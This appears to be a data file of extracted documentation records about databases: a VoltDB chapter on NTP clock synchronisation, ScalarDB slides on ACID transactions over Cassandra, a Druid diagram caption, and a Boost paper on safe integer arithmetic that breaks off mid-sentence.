sufficient. However, there are issues that can arise\ntime varies within the cluster.\nIf you are unsure whether a difference between the clocks in your cluster is causing performance issues\nfor your database, the first step is to determine how much clock skew is present. When the VoltDB server\nstarts it reports the maximum clock skew as part of its startup routine. For example:\nINFO - HOST: Maximum clock/network skew is 12 milliseconds (according to leader)\nIf the skew is greater than 200 milliseconds, the cluster refuses to start. But even if the skew is around\n100 milliseconds, the difference can delay certain operations and the nodes may drift farther apart in the\nfuture. The most common issues when using NTP to manage time are:\n•Time drifts between adjustments\n•Different time servers reporting different times\n13.2.3. Correcting Common Problems with Time\nThe NTP daemon checks the time servers periodically and adjusts the system clock to account for any drift\nbetween the local clock and the reference server (by default, somewhere between every 1 to 17 minutes).\nIf the local clock drifts too much during that interval, it may never be able to fully correct itself or provide\na consistent time value to VoltDB.\nYou can reduce the polling interval by setting the minpoll and maxpoll arguments as part of the server\ndefinition in the NTP configuration file. By setting minpoll and maxpoll to a low value (measured as\nexponential values of 2 seconds), you can ensure that the VoltDB server checks more frequently. For\nexample, setting minpoll and maxpoll to 4 (that is, 16 seconds), you ensure the daemon polls the reference\nserver approximately every minute3.\nIt is also possible that the poll does not get a response. When this happens, the NTP daemon normally waits\nfor the next interval before checking again. To increase the likelihood of receiving a new reference time\n— especially in environments with network fluctuations — you can use the burst and iburst arguments to\nincrease the number of polls during each internal.\nBy combining the burst, iburst, minpoll, and maxpoll arguments, you can increase the frequency that the\nNTP daemon synchronizes and thereby reduce the potential drift of the local server's clock. However, you\nshould not use these arguments with public servers, such as the ones included in the NTP configuration\n2Use of the -x option is recommended. This option causes NTP to \"slew\" time — slowly increasing or decreasing the clock to adjust time — instead\nof making one-time jumps that could create sudden changes in clock skew for the entire cluster.\n3The default values for minpoll and maxpoll are 6 and 10, respectively. The allowable value for both is any integer between 4 and 17 inclusive.\n82Managing Time\nfile by default. Excessive polling of public servers is considered impolite. Instead, you should only use\nthese arguments with a private server (as described in Section 13.2.4, “Example NTP Configuration” ). For\nexample, the ntp.conf entry might look like the following:\nserver myntpsvr iburst burst minpoll 4 maxpoll 4\nEven if your system synchronizes with an NTP server, there can be skew between the reference servers\nthemselves. Remember, the goal of NTP is to synchronize your system with a reference time source, not\nnecessarily to reduce the skew between multiple local systems. Even if the polling frequency is improved\nfor each node in a VoltDB cluster, the skew between them may never reach an acceptable value if they\nare synchronizing against different reference servers.\nThis situation is made worse by the fact that the most common host names for reference servers (such\nas ntp.ubuntu.com) are not actual IP addresses, but rather front ends to a pool of servers. So even if the\nVoltDB nodes have the same NTP configuration file, they might not end up synchronizing against the\nsame physical reference server.\nYou can determine what actual servers your system is using to synchronize by using the NTP query tool\n(ntpq) with the -p argument. The tool displays a list of the servers it has selected, with an asterisk (*)\nnext to the server currently in use and plus signs (+) next to alternatives in case the primary server is\nunavailable. For example:\n$ ntpq -p\n remote refid st t when poll reach delay offset jitter\n==============================================================================\n+dns3.cit.cornel 192.5.41.209 2 u 14 1024 377 32.185 2.605 0.778\n-louie.udel.edu 128.4.1.20 2 u 297 1024 377 22.060 3.643 0.920\n gilbreth.ecn.pu .STEP. 16 u - 1024 0 0.000 0.000 0.000\n*otc2.psu.edu 128.118.2.33 2 u 883 1024 377 29.776 1.963 0.901\n+europium.canoni 193.79.237.14 2 u 1017 1024 377 90.207 2.741 0.874\nNote that NTP does not necessarily choose the first server on the list and that the generic host names are\nresolved to different physical servers.\nSo, although it is normal to have multiple servers listed in the NTP configuration file for redundancy, it can\nintroduce differences in the local system clocks. If the maximum skew for a VoltDB cluster is consistently\noutside of acceptable values, you should take the following steps:\n•Change from using generic host names to specific server IP addresses (such as otc2.psu.edu or\n128.118.2.33 in the preceding example)\n•List only one NTP server to ensure all VoltDB nodes synchronize against the same reference point\nOf course, using only one reference server for time introduces a single point of failure to your environ-\nment. If the reference server is not available, the database nodes receive no new reference values for time.\nThe nodes continue to synchronize as best they can, based on the last valid reference time and historical\ninformation about skew. But over time, the clock skew within the cluster will start to drift.\n13.2.4. Example NTP Configuration\nYou can provide both redundancy and maintain a single source for time synchronization, by creating your\nown NTP server.\nNTP assumes a hierarchy (or strata) of servers, where each level of server synchronizes against servers\none level up and provides synchronization to servers one level down. You can create your own reference\nserver by inserting a server between your cluster nodes and the normal reference servers.\n83Managing Time\nFor example, assume you have a node myntpsvr that uses the default NTP configuration for setting its own\nclock. It can list multiple reference servers and use the generic host names, since the actual time does not\nmatter, just that all cluster nodes agree on a single source.\nThen the VoltDB cluster nodes list your private NTP server as their one and only reference node. By doing\nthis, all the nodes synchronize against a single source, which has strong availability since it is within the\nsame physical infrastructure as the database cluster.\nOf course, there is always the possibility that access to your own NTP server could fail, in which case\nthe database nodes need a fallback to ensure they continue to synchronize against the same source. You\ncan achieve this by:\n•Adding all of the cluster nodes as peers of the current node in the NTP configuration file\n•Adding the current node (localhost) as its own server and setting it as a low level stratum (for example,\nstratum 10)\nBy listing the nodes of the cluster as peers, you ensure that when the reference server (myntpsvr in this\nexample) becomes unavailable, the nodes will negotiate between themselves on an alternative source. At\nthe same time, listing localhost (127.127.0.1) as a server tells the node that it can use itself as a reference\nserver. In other words, the cluster nodes will agree among themselves to use one of their own as the\nreference server for synchronizing time. Finally, by using the fudge statement to set the stratum of localhost\nto 10, you ensure that the cluster will only pick one of its own members as a reference server for NTP if\nthe primary server is unavailable.\nExample 13.1, “Custom NTP Configuration File” shows what the resulting NTP configuration file might\nlook like. This configuration can be the same on all nodes of the cluster, since peer entries referencing\nthe current node are ignored.\nExample 13.1. Custom NTP Configuration File\nserver myntpsvr burst iburst minpoll 4 maxpoll 4\npeer voltsvr1 burst iburst minpoll 4 maxpoll 4\npeer voltsvr2 burst iburst minpoll 4 maxpoll 4\npeer voltsvr3 burst iburst minpoll 4 maxpoll 4\nserver 127.127.0.1\nfudge 127.127.0.1 stratum 10\n13.3. Configuring NTP in a Hosted, Virtual, or\nCloud Environment\nThe preceding recommendations for using NTP work equally well in a managed or a hosted environment.\nHowever, there are some additional issues that can arise when working in a hosted environment that should\nbe considered.\nIn a locally managed environment, you have complete control over both the hardware and software con-\nfiguration. This means you can ensure that the VoltDB cluster nodes are connected to the same switch and\nin close proximity to a private NTP server, guaranteeing the best network performance within the cluster\nand to the NTP reference server.\nIn a hosted environment, you may not have control over the physical arrangement of servers but you\nusually have control of the software configuration.\n84Managing Time\nIn a virtualized or cloud environment, you have no control over — or even knowledge of — the hardware\nconfiguration. You are often using a predefined system image or \"instance\", including the operating system\nand time management configuration, which may not be appropriate for VoltDB. There are configuration\nchanges you should consider making each time you \"spin up\" a new virtual server.\n13.3.1. Considerations for Hosted Environments\nIn situations where you have control over the selection and configuration of the server operating system\nand services, the preceding recommendations for configuring NTP should be sufficient. The key concern\nwould be those aspects of the environment you do not have control over: network bandwidth and reliabil-\nity. Again, the recommended NTP configuration in Section 13.2.4, “Example NTP Configuration” , espe-\ncially the use of a local timer server and peer relationship within the cluster, should provide reliable time\nmanagement despite any network fluctuations.\n13.3.2. Considerations for Virtual and Cloud Environments\nIn virtual or cloud environments, you usually do not have control over either the hardware or the initial\nsoftware configuration. New servers are instantiated from a common system image, or \"instance\", with\ndefault configurations for the operating system and time management. This presents two problems for\nestablishing a reliable environment for VoltDB:\n•The default configuration may not be sufficient and must be overridden\n•Because of the prior issue, there can be considerable clock skew that must be corrected before running\nVoltDB\nVirtualization allows multiple virtual servers to run on a single piece of hardware. To do this, prepackaged\n\"instances\" of an operating system are booted under a virtual machine manager. These instances are de-\nsigned to support the majority of applications, most of which do not have extensive requirements for clock\nsynchronization, As a result, the instances often use default NTP configurations or none at all.\nWhen you spin up a new virtual server, in most cases you need to reconfigure NTP, changing the config-\nuration file as described in Section 13.2.4, “Example NTP Configuration” and restarting the service.\nIn some cases, NTP is not used at all. Instead, the operating system synchronizes its (virtual) clock against\nthe clock of the physical server on which it runs. You need to override this setting before installing, con-\nfiguring, and starting NTP. For example, when running early instances of Ubuntu in EC2 under the Xen\nhypervisor, you must modify the file /proc/sys/xen/independent_wallclock to avoid the hy-\npervisor performing the clock synchronization. For example:\n$ echo \"1\" > /proc/sys/xen/independent_wallclock\n$ apt-get install -y ntp\nThis particular approach is specific to the Xen hypervisor. Other virtualization engines may use a different\napproach for controlling the system clock. See the documentation for your specific virtualization environ-\nment for details.\nOnce NTP is running and managing the system clock, it can take a considerable amount of time for the\nclocks to synchronize if the initial skew is large. You can reduce this initial delay by forcing synchroniza-\ntion before you start VoltDB. You can do this performing the following steps as the user root:\n1.Stop the NTP service.\n2.Use the ntpdate command to synchronize against a specific reference server. Do this several times\nuntil the reported skew is consistently low. (It will never effectively be less than a millisecond — a\nthousandth of a second — but can be reduced to a few milliseconds.)\n85Managing Time\n3.Restart the NTP Service.\nFor example, if your local time server's IP address is 10.10.56.1, the commands might look like this:\n$ service ntp stop\n * Stopping NTP server ntpd [ OK ]\n$ ntpdate -p 8 10.10.56.1\n20 Oct 09:21:04 ntpdate[2795]: adjust time server 10.10.56.1 offset 0.008294 sec\n$ ntpdate -p 8 10.10.56.1\n20 Oct 09:21:08 ntpdate[2797]: adjust time server 10.10.56.1 offset 0.002518 sec\n$ ntpdate -p 8 10.10.56.1\n20 Oct 09:21:12 ntpdate[2798]: adjust time server 10.10.56.1 offset 0.001459 sec\n$ service ntp start -x\n * Starting NTP server ntpd [ OK ]\nOnce NTP is configured and the skew between the individual clocks and the reference server has been\nminimized, you can safely start the VoltDB database.\n86" } ]
{ "category": "App Definition and Development", "file_name": "TransactionManagementOnCassandra.pdf", "project_name": "ScalarDB", "subcategory": "Database" }
[ { "data": "Transaction Management on Cassandra10 Sep,2019 at ApacheCon NA 2019Hiroyuki YamadaCTO/CEO at Scalar, Inc.1\n© 2019Scalar, inc.\nWho am I ?•Hiroyuki Yamada–Passionate about Database Systems and Distributed Systems–Ph.D. in Computer Science, the University of Tokyo–IIS the University of Tokyo, Yahoo! Japan, IBM Japan\n2© 2019Scalar, inc.\nAgenda•What is Scalar DB•Transaction Management on Cassandra•Benchmark and Verification Results\n3© 2019Scalar, inc.\nMaybe You Don’t Need ACID Transactions•ACID transactions are heavy–Especially when data is distributed•One of other solutions:–Make operations idempotent and retry them if atomicity is not required\n4© 2019Scalar, inc.\nWhat is Scalar DB•A library that makes non-ACID distributed databases ACID-compliant–Cassandra is the first supported distributed database\n5\nhttps://github.com/scalar-labs/scalardb\nTransaction management, Recovery management, Java API© 2019Scalar, inc.\nSystem Architecture with Scalar DB and Cassandra\n6Cassandra nodesAchieves one-copy Serializable Transactions\nWeb ApplicationsClientprogramsScalar DB\nDataStaxJava DriverEnd UsersHTTPCommandexecution\nKey key = new Key(new TextValue(“id”, ”1”));Result result = db.get(new Get(key));// do something with resultPut put = new Put(key).(…);db.put(put)Scalar DB© 2019Scalar, inc.\nKey Characteristics•Non-invasive approach–Any modifications to the underlying database are not required•Highavailability–Available as long as quorum of replicas are up–C* high availability is fully sustained by the client-coordinated approach •Horizontal scalability–Throughput scales linearly–C* high scalability is fully sustained by the client-coordinated approach •Strong Consistency–Replicas updated by transactions are always consistent and up-to-date7© 2019Scalar, inc.\nTransaction Management on Cassandra -Introduction•Based on Cherry Garcia protocol [ICDE’15] –Requires minimum set of features such as linearizable conditional update and the ability to store metadata•Scalar DB is one of the applications of the protocol–Use LWT for Linearizability–Manage transaction metadata in user record space•Implement enhancements–Protocol correction–No use of TrueTimeAPI–Serializable support (SI is the default isolation level)8© 2019Scalar, inc.\nTransaction Metadata Management•WAL (Write-Ahead Logging) records are distributed \n9Application dataTransaction metadataAfter imageBefore imageApplication data(Before)Transaction metadata(Before)StatusVersionTxIDStatus(before)Version(before)TxID(before)\nTxIDStatusOther metadataStatus Recordin coordinatortableUser/ApplicationRecordin user tables\nApplication data(managed by users)Transaction metadata(managed by Scalar DB)© 2019Scalar, inc.\nTransaction Protocol -Overview•Optimistic concurrency control•Similar to 2 phase commit protocol–Prepare phase: prepare records–Commit phase 1: commit status–This is where a transaction is regarded as committed or aborted in normal cases–(Commit phase 2: commit records)•Lazy recovery–Uncommitted records will be rollforwardedor rollbacked based on the status of a transaction when the records are read10© 2019Scalar, inc.\nTransaction Protocol By Examples –Prepare Phase\n11Client1Client1’s memory spaceCassandraReadAtomic conditional update (LWT)Update only ifthe version is the version I readFail due tothe condition mismatchUserIDBalanceStatusVersion1100C5TxIDXXX2100C4YYY180P6Tx12120P5Tx1Tx1: Transfer 20 from 1 to 2\nClient2UserIDBalanceStatusVersion1100C5Client2’s memory spaceTx2: Transfer 10 from 1 to 2TxIDXXX2100C4YYY190P6Tx22110P5Tx2UserIDBalanceStatusVersion1100C5TxIDXXX2100C4YYY© 2019Scalar, inc.\nTransaction Protocol By Examples –Commit Phase 1\n12Cassandra\nUserIDBalanceStatusVersion180P6TxIDTx12120P5Tx1StatusCTxIDXXXCYYYAZZZCTx1Atomic conditional update (LWT)Update ifthe TxIDdoes not existClient1 with Tx1© 2019Scalar, inc.\nTransaction Protocol By Examples –Commit Phase 2\n13Cassandra\nUserIDBalanceStatusVersion180C6TxIDTx12120C5Tx1StatusCTxIDXXXCYYYAZZZCTx1Atomic conditional update (LWT)Update status ifthe record is prepared by the TxIDClient1 with Tx1© 2019Scalar, inc.\nFailure Handling by Examples•If TX1 fails before prepare phase–Just clear the memory space for TX1•If TX1 fails after prepare phase and before commit phase 1 (no status is written in Status table)–Another transaction (TX3) reads the records and notices that the records are prepared and there is no status for it –TX3 tries to abort TX1 (TX3 tries to write ABORTED to Status with TX1’s TXID and rolls back the records)–TX1 might be on it’s way to commit status, but onlyone can win, not both•If TX1 fails (right) after commit phase 1–Another transaction (TX3) tries to commit the records (rollforward) on behalf of TX1 when TX3 reads the same records as TX1–TX1mightbeonit’s way to commit records, but only one can win, not both14© 2019Scalar, inc.\nBenchmark Results\n15\nWorkload2 (Evidence)\nWorkload1 (Payment)\nEach node: i3.4xlarge (16 vCPUs, 122 GB RAM, 1900 GB NVMeSSD * 2), RF: 3•Achieved 90 % scalability in 100-node cluster (Compared to the Ideal TPS based on the performance of 3-node cluster)© 2019Scalar, inc.\nVerification Results•Scalar DB has been heavily tested with Jepsen and our destructive tools–Note that Jepsen tests are created and conducted by Scalar•It has passed both tests for a long time•See https://github.com/scalar-labs/scalar-jepsenfor more detail\n16Jepsen Passed© 2019Scalar, inc.\nOther Contributions for Apache Cassandra from Scalar•GroupCommitlogService–Yuji Ito–Group multiple commitlogwrites at once–CASSANDRA-13530•Jepsen tests for Cassandra –Yuji Ito, Craig Pastro–Maintain with the latest Jepsen–Rewrite with Alia clojuredriver–https://github.com/scalar-labs/scalar-jepsen•Cassy–A simple and integrated backup tool–Just released under Apache 2–https://github.com/scalar-labs/cassy17© 2019Scalar, inc.\nCassy: A simple and integrated backup tool\n18\n•Required to take a transactionallyconsistent backup© 2019Scalar, inc.\nFuture Work•DataStax driver 4.x support•Cassandra 4.x support–Hopefully nothing needs to be done•Other C* compatible databases integration–Scylla DB (waiting for LWT)–Cosmos DB (waiting for LWT)•(HBase adapter)\n19© 2019Scalar, inc.\nQuestions ?\n20© 2019Scalar, inc.\nOptimization•Prepare in deterministic order–=> First prepare always wins\n21TX1: updating K1 and K2 and K3TX2: updating K2 and K3 and K4H: Consistent hashingK1K2K3K2K3K4Always prepare in this order !!!(otherwise, all Txsmight abort. Ex. TX1 prepares K1,K2 and TX2 prepares K4,K3 in this order)H(K2)H(K1)H(K3)H(K4)© 2019Scalar, inc.\nSnapshot Isolation•Strong isolation level but weaker than Serializable–Similar to “MVCC”–Oracle’s most strict isolation level (it’s called “Serializable”)•Read only sees a snapshot (=> non blocking reads)•Mostly strong enough but there are still some anomalies\n22© 2019Scalar, inc.\nAnomalies in Snapshot Isolation•Write Skew, Read-Only Transaction•Write skew example:–Account balances: X and Y (assume family account)–Initial state: X=70, Y=80–Constraint: X + Y > 0–TX1: X = X –100, TX2: Y = Y -100–H: R1(X0, 70) R2(X0, 70) R1(Y0, 80) R2(Y0, 80)W1(X1, −30)C1 W2(Y2, −20)C2\n237080X0Y070-100 -> -3080XYTX17080-100 -> -20XYTX2Update succeeds without conflictin Snapshot IsolationOk for the constraintOk for the constraintUpdate XUpdate Y-30-20\n© 2019Scalar, inc.\nSerializable Support•Convert all reads into writes (writing the same value) in a transaction\n24© 2019Scalar, inc.\nProtocol Correction•Commit records by non-atomically–=> NO!!!•Someone else have already did it and have started and prepared a new transaction\n25TX1TX2Start and Prepare ACommit StatusCommit A (without knowing A with TX1 is already committed, and A is overwritten by a new TX2)\nRead A and commit A on behalf of TX1Start and Prepare ACommit StatusCommit A\n" } ]
{ "category": "App Definition and Development", "file_name": "historical_download.pdf", "project_name": "Druid", "subcategory": "Database" }
[ { "data": "Deep Storage\nSegmentMemory\nDisk\nCache \nEntriesSegmentSegment\ndownload\ncreate keyLoad" } ]
{ "category": "App Definition and Development", "file_name": "accu.pdf", "project_name": "ArangoDB", "subcategory": "Database" }
[ { "data": "Correct Integer Operations\nWith Minimal Runtime Penalties\nRobert Ramey, Robert Ramey Software Development\n22 December 2016\n1. Introduction\nThis library is intended as a drop-in replacement for all built-in integer types in any program which must:\n•be demonstrably and verifiably correct.\n•detect every user error such as input, assignment, etc.\n•be efficient as possible subject to the constraints above.\n1.1. Problem\nArithmetic operations in C/C++ are NOT guaranteed to yield a correct mathematical result. This feature is inherited from the\nearly days of C. The behavior of int, unsigned int and others were designed to map closely to the underlying hardware.\nComputer hardware implements these types as a fixed number of bits. When the result of arithmetic operations exceeds this\nnumber of bits, the result will not be arithmetically correct. The following example illustrates just one example where this\ncauses problems.\nint f(int x, int y){\n // this returns an invalid result for some legal values of x and y !\n return x + y;\n}\nIt is incumbent upon the C/C++ programmer to guarantee that this behavior does not result in incorrect or unexpected\noperation of the program. There are no language facilities which implement such a guarantee. A programmer needs to\nexamine each expression individually to know that his program will not return an invalid result. There are a number of ways\nto do this. In the above instance, [ INT32-C] seems to recommend the following approach:\nint f(int x, int y){\n if (((y > 0) && (x > (INT_MAX - y))) \n || ((y < 0) && (x < (INT_MIN - y)))) {\n /* Handle error */\n }\n return x + y;\n}\nThis will indeed trap the error. However, it would be tedious and laborious for a programmer to alter his code to do so.\nAltering code in this way for all arithmetic operations would likely render the code unreadable and add another source of\npotential programming errors. This approach is clearly not functional when the expression is even a little more complex as is\nshown in the following example.\nint f(int x, int y, int z){\n // this returns an invalid result for some legal values of x and y !\n return x + y * z;\n1Correct Integer Operations With\nMinimal Runtime Penalties\n}\nThis example addresses only the problem of undefined/erroneous behavior related to overflow of the addition operation as\napplied to the type int. Similar problems occur with other built-in integer types such as unsigned , long, etc. And it also\napplies to other operations such as subtraction, multiplication etc. . C/C++ often automatically and silently converts some\ninteger types to others in the course of implementing binary operations and similar problems occur in this case as well. Since\nthe problems and their solution are similar, We'll confine the current discussion to just this one example.\n1.2. Solution\nThis library implements special versions of int, unsigned , etc. which behave exactly like the original ones except that the\nresults of these operations are guaranteed to be either arithmetically correct or invoke an error. Using this library, the above\nexample would be rendered as:\n#include <boost/safe_numeric /safe_integer .hpp>\nusing namespace boost::numeric ;\nsafe<int> f(safe<int> x, safe<int> y){\n return x + y; // throw exception if correct result cannot be returned\n}\nNote\nLibrary code in this document resides in the name space boost::numeric . This name space has generally\nbeen eliminated from text, code and examples in order to improve readability of the text.\nThe addition expression is checked at runtime or (if possible) at compile time to trap any possible errors resulting in incorrect\narithmetic behavior. This will permit one to write arithmetic expressions that cannot produce an erroneous result. Instead, one\nand only one of the following is guaranteed to occur.\n•the expression will yield the correct mathematical result\n•the expression will emit a compilation error.\n•the expression will invoke a runtime exception.\nIn other words, the library absolutely guarantees that no arithmetic expression will yield incorrect results .\n1.3. How It Works\nThe library implements special versions of int, unsigned , etc. named safe<int> , safe<unsigned int> etc. These\nbehave exactly like the underlying types except that expressions using these types fulfill the above guarantee. These types\nare meant to be \"drop-in\" replacements for the built-in types they are meant to replace. So things which are legal - such as\nassignment of a signed to unsigned value - are not trapped at compile time as they are legal C/C++ code. Instead, they are\nchecked at runtime to trap the case where this (legal) operation would lead to an arithmetically incorrect result.\nNote that the library addresses arithmetical errors generated by straightforward C/C++ expressions. Some of these arithmetic\nerrors are defined as conforming to the C/C++ standards while others are not. So characterizing this library as addressing\nundefined behavior of C/C++ numeric expressions would be misleading.\nFacilities particular to C++14 are employed to minimize any runtime overhead. In many cases there is no runtime overhead\nat all. In other cases, a program using the library can be slightly altered to achieve the above guarantee without any runtime\noverhead.\n2Correct Integer Operations With\nMinimal Runtime Penalties\n1.4. Additional Features\nOperation of safe types is determined by template parameters which specify a pair of policy classes which specify the\nbehavior for type promotion and error handling. In addition to the usage serving as a drop-in replacement for standard integer\ntypes, users of the library can:\n•Select or define an exception policy class to specify handling of exceptions.\n•throw exception on runtime, trap at compile time.\n•trap at compiler time all operations which might fail at runtime.\n•specify custom functions which should be called at runtime\n•Select or define a promotion policy class to alter the C/C++ type promotion rules. This can be used to\n•use C/C++ native type promotion rules so that, except for throwing/trapping of exceptions on operations resulting in\nincorrect arithmetic behavior, programs will operate identically when using/not using safe types.\n•replace C/C++ native promotion rules with ones which are arithmetically equivalent but minimize the need for runtime\nchecking of arithmetic results.\n•replace C/C++ native promotion rules with ones which emulate other machine architectures. This is designed to permit\nthe testing of C/C++ code destined to be run on another machine on one's development platform. Such a situation often\noccurs while developing code for embedded systems.\n•Enforce of other program requirements using ranged integer types. The library includes the types safe_range(Min,\nMax) and safe_literal(N) . These types can be used to improve program correctness and performance.\n1.5. Requirements\nThis library is composed entirely of C++ Headers. It requires a compiler compatible with the C++14 standard.\nThe following Boost Libraries must be installed in order to use this library\n•MPL\n•Integer\n•Config\n•Concept Checking\n•Tribool\n•Enable_if\nThe Safe Numerics library is delivered with an exhaustive suite of test programs. Users who choose to run this test suite will\nalso need to install the Boost.Preprocessor library.\n1.6. Scope\nThis library currently applies only to built-in integer types. Analogous issues arise for floating point types but they are not\ncurrently addressed by this version of the library. User or library defined types such as arbitrary precision integers can also\nhave this problem. Extension of this library to these other types is not currently under development but may be addressed in\nthe future. This is one reason why the library name is \"safe numeric\" rather than \"safe integer\" library.\n3Correct Integer Operations With\nMinimal Runtime Penalties\n2. Eliminating Runtime Penalty\nUp until now, we've focused on detecting when incorrect results are produced and handling these occurrences either\nby throwing an exception or invoking some designated function. We've achieved our goal of detecting and handling\narithmetically incorrect behavior - but at what cost. It is a fact that many C++ programmers will find this trade-off\nunacceptable. So the question arises as to how we might minimize or eliminate this runtime penalty.\nThe first step is to determine what parts of a program might invoke exceptions. The following program is similar to previous\nexamples but uses a special exception policy: trap_exception .\n#include <iostream >\n#include \"../include/safe_integer.hpp\"\n#include \"../include/exception.hpp\" // include exception policies\nusing safe_t = boost::numeric ::safe<\n int,\n boost ::numeric ::native ,\n boost ::numeric ::trap_exception // note use of \"trap_exception\" policy!\n>;\nint main(int argc, const char * argv[]){\n std::cout << \"example 81:\\n\" ;\n safe_t x(INT_MAX );\n safe_t y(2);\n safe_t z = x + y; // will fail to compile !\n return 0;\n}\nNow, any expression which might fail at runtime is flagged with a compile time error. There is no longer any need for try/\ncatch blocks . Since this program does not compile, the library absolutely guarantees that no arithmetic expression\nwill yield incorrect results . This is our original goal. Now all we need to do is make the program work. There are a couple\nof ways to do this.\n2.1. Using Automatic Type Promotion\nThe C++ standard describes how binary operations on different integer types are handled. Here is a simplified version of the\nrules:\n•promote any operand smaller than int to an int or unsigned int .\n•if the signed operand is larger than the signed one, the result will be signed, otherwise the result will be unsigned.\n•expand the smaller operand to the size of the larger one\nSo the result of the sum of two integer types may result in another integer type. If the values are large, the result can exceed\nthe size that the resulting integer type can hold. This is what we call \"overflow\". The C/C++ standard characterises this as\nundefined behavior and leaves to compiler implementors the decision as to how such a situation will be handled. Usually,\nthis means just truncating the result to fit into the result type - which sometimes will make the result arithmetically incorrect.\nHowever, depending on the compiler, compile time switch settings, the such case may result in some sort of run time\nexception.\nThe complete signature for a safe integer type is:\ntemplate <\n4Correct Integer Operations With\nMinimal Runtime Penalties\n class T, // underlying integer type\n class P = native , // type promotion policy class\n class E = throw_exception // error handling policy class\n>\nsafe;\nThe standard C++ type promotion rules are consistent with the default native type promotion policy. Up until now, we've\nfocused on detecting when this happens and invoking an interrupt or other kind of error handler.\nBut now we look at another option. Using the automatic type promotion policy, we can change the rules of C++ arithmetic\nfor safe types to something like the following:\n•for any C++ numeric type, we know from std::numeric_limits what the maximum and minimum values that a\nvariable can be - this defines a closed interval.\n•For any binary operation on these types, we can calculate the interval of the result at compile time.\n•From this interval we can select a new type which can be guaranteed to hold the result and use this for the calculation. This\nis more or less equivalent to the following code:\nint x, y;\nint z = x + y // could overflow\nint x, y;\nlong z = (long)x + (long)y; // can never overflow\nOne could do this by editing his code manually, but such a task would be tedious, error prone, and leave the resulting\ncode hard to read and verify. Using the automatic type promotion policy will achieve the equivalent result without these\nproblems\n•Since the result type is guaranteed to hold the result, there is no need to check for errors - they can't happen !!! The usage\nof trap_exception exception policy enforces this guarantee\n•Since there can be no errors, there is no need for try/catch blocks.\n•The only runtime error checking we need to do is when safe values are initialized or assigned from values which are \"too\nlarge\". These are infrequent occurrences which generally have little or no impact on program running time. And many\ntimes, one can make small adjustments in selecting the types in order to eliminate all runtime penalties.\nIn short, given a binary operation, we silently promote the types of the operands to a wider result type so the result cannot\noverflow. This is a fundamental departure from the C++ Standard behavior.\nIf the interval of the result cannot be contained in the largest type that the machine can handle (usually 64 bits these days),\nthe largest available integer type with the correct result sign is used. So even with our \"automatic\" type promotion scheme,\nit's still possible to overflow. In this case, and only this case, is runtime error checking code generated. Depending on the\napplication, it should be rare to generate error checking code, and even more rare to actually invoke it. Any such instances are\ndetected by the trap_exception exception policy.\nThis small example illustrates how to use automatic type promotion to eliminate all runtime penalty.\n#include <iostream >\n#include \"../include/safe_integer.hpp\"\n#include \"../include/exception.hpp\"\n#include \"../include/automatic.hpp\"\n#include \"safe_format.hpp\" // prints out range and value of any type\n5Correct Integer Operations With\nMinimal Runtime Penalties\nusing safe_t = boost::numeric ::safe<\n int,\n boost ::numeric ::automatic , // note use of \"automatic\" policy!!!\n boost ::numeric ::trap_exception\n>;\nint main(int argc, const char * argv[]){\n std::cout << \"example 82:\\n\" ;\n safe_t x(INT_MAX );\n safe_t y = 2;\n std::cout << \"x = \" << safe_format (x) << std::endl;\n std::cout << \"y = \" << safe_format (y) << std::endl;\n std::cout << \"z = \" << safe_format (x + y) << std::endl;\n return 0;\n}\nThe above program produces the following output:\nexample 82:\nx = <int>[-2147483648,2147483647] = 2147483647\ny = <int>[-2147483648,2147483647] = 2\nz = <long>[-4294967296,4294967294] = 2147483649\nThe output uses a custom output manipulator for safe types to display the underlying type and its range as well as current\nvalue. Note that:\n•the automatic type promotion policy has rendered the result of the some of two integers as a long type.\n•our program compiles without error - even when using the trap_exception exception policy\n•We do not need to use try/catch idiom to handle arithmetic errors - we will have none.\n•We only needed to change two lines of code to achieve our goal\n2.2. Using safe_range\nInstead of relying on automatic type promotion, we can just create our own types in such a way that we know they won't\noverflow. In the example below, we presume we know that the values we want to work with fall in the range [-24,82]. So we\n\"know\" the program will always result in a correct result. But since we trust no one, and since the program could change and\nthe expressions be replaced with other ones, we'll still use the trap_exception exception policy to verify at compile time\nthat what we \"know\" to be true is in fact true.\n#include <iostream >\n#include \"../include/safe_range.hpp\"\n#include \"../include/safe_literal.hpp\"\n#include \"../include/exception.hpp\"\n#include \"../include/native.hpp\"\n#include \"safe_format.hpp\" // prints out range and value of any type\nusing namespace boost::numeric ; // for safe_literal\n// create a type for holding small integers. We \"know\" that C++\n// type promotion rules will work such that addition will never\n// overflow. If we change the program to break this, the usage\n6Correct Integer Operations With\nMinimal Runtime Penalties\n// of the trap_exception promotion policy will prevent compilation.\nusing safe_t = safe_signed_range <\n -24,\n 82,\n native , // C++ type promotion rules work OK for this example\n trap_exception // catch problems at compile time\n>;\nint main(int argc, const char * argv[]){\n std::cout << \"example 83:\\n\" ;\n // the following would result in a compile time error\n // since the sum of x and y wouldn't be in the legal\n // range for z.\n // const safe_signed_literal<20> x;\n const safe_signed_literal <10> x; // no problem\n const safe_signed_literal <67> y;\n const safe_t z = x + y;\n std::cout << \"x = \" << safe_format (x) << std::endl;\n std::cout << \"y = \" << safe_format (y) << std::endl;\n std::cout << \"z = \" << safe_format (z) << std::endl;\n return 0;\n}\n•safe_signed_range defines a type which is limited to the indicated range. Out of range assignments will be detected at\ncompile time if possible (as in this case) or at run time if necessary.\n•safe_literal defines a constant with a specific value. Defining constants in this way enables the library to correctly\nanticipate the range of the results of arithmetic expressions.\n•The usage of \"trap exception\" will mean that any assignment to z which could be outside the legal range will result in a\ncompile time error.\n•So if this program compiles, it's guaranteed to return a valid result.\nThis program produces the following run time output.\nexample 83:\nx = <signed char>[10,10] = 10\ny = <signed char>[67,67] = 67\nz = <signed char>[-24,82] = 77\n2.3. Mixing Approaches\nFor purposes of exposition, we've divided the discussion of how to eliminate runtime penalties by the different approaches\navailable. A realistic program would likely include all techniques mentioned above. Consider the following:\n#include <stdexcept >\n#include <iostream >\n#include \"../include/safe_range.hpp\"\n#include \"../include/automatic.hpp\"\n#include \"../include/exception.hpp\"\n#include \"safe_format.hpp\" // prints out range and value of any type\nusing namespace boost::numeric ;\n7Correct Integer Operations With\nMinimal Runtime Penalties\nusing safe_t = safe_signed_range <\n -24,\n 82,\n automatic ,\n trap_exception\n>;\n// define variables use for input\nusing input_safe_t = safe_signed_range <\n -24,\n 82,\n automatic , // we don't need automatic in this case\n throw_exception // these variables need to\n>;\n// function arguments can never be outside of limits\nauto f(const safe_t & x, const safe_t & y){\n auto z = x + y; // we know that this cannot fail\n std::cout << \"z = \" << safe_format (z) << std::endl;\n std::cout << \"(x + y) = \" << safe_format 